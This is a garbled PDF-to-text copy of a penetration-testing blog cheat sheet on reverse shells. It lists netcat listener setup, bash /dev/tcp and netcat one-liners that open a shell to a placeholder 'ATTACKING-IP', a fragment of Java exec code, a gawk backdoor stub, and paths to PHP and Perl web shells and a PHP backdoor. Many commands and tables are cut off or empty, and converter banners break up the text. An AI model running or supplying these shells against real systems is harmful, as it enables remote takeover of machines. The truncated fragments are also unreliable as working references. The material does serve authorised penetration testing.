Reverse Shell Cheat Sheet
Reverse Shell Cheat Sheet
All Blog
Reverse Shell Cheat Sheet ∞ Cheat Sheets
Techniques
Security Hardening
CHEAT-SHEET 29 Mar 2015 Arr0way
WalkThroughs
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
the post are a collec on of uploadable Python Reverse Shell More »
SECURITY HARDENING
To setup a listening netcat instance, enter the following: Security Harden CentOS
7
More »
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
/DEV/URANDOM
root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
MacBook - Post Install
nc: listening on 0.0.0.0 80 ...
Config + Apps
More »
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Perl Windows Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <
p.waitFor()
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = "bkd> "
COMMAND DESCRIPTION
/usr/share/webshells/php/
Pen Test Monkey - PHP Reverse Shell
php-reverse-shell.php
/usr/share/webshells/ Larger PHP shell, with a text input box for command
php/php-backdoor.php execu on.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
★ Tip: Execu ng Reverse Shells
The last two shells above are not reverse shells, however they can be useful for executing a
reverse shell.
COMMAND DESCRIPTION
/usr/share/webshells/perl/
Pen Test Monkey - Perl Reverse Shell
perl-reverse-shell.pl
COMMAND DESCRIPTION
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Kali ASP Shell
COMMAND DESCRIPTION
COMMAND DESCRIPTION
COMMAND DESCRIPTION
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Share this on...
Twi er Facebook Google+ Reddit
Follow Arr0way
Twi er GitHub
Also...
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
kali linux HowTo: Kali Linux Chromium Install for Web App Pen Testing
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD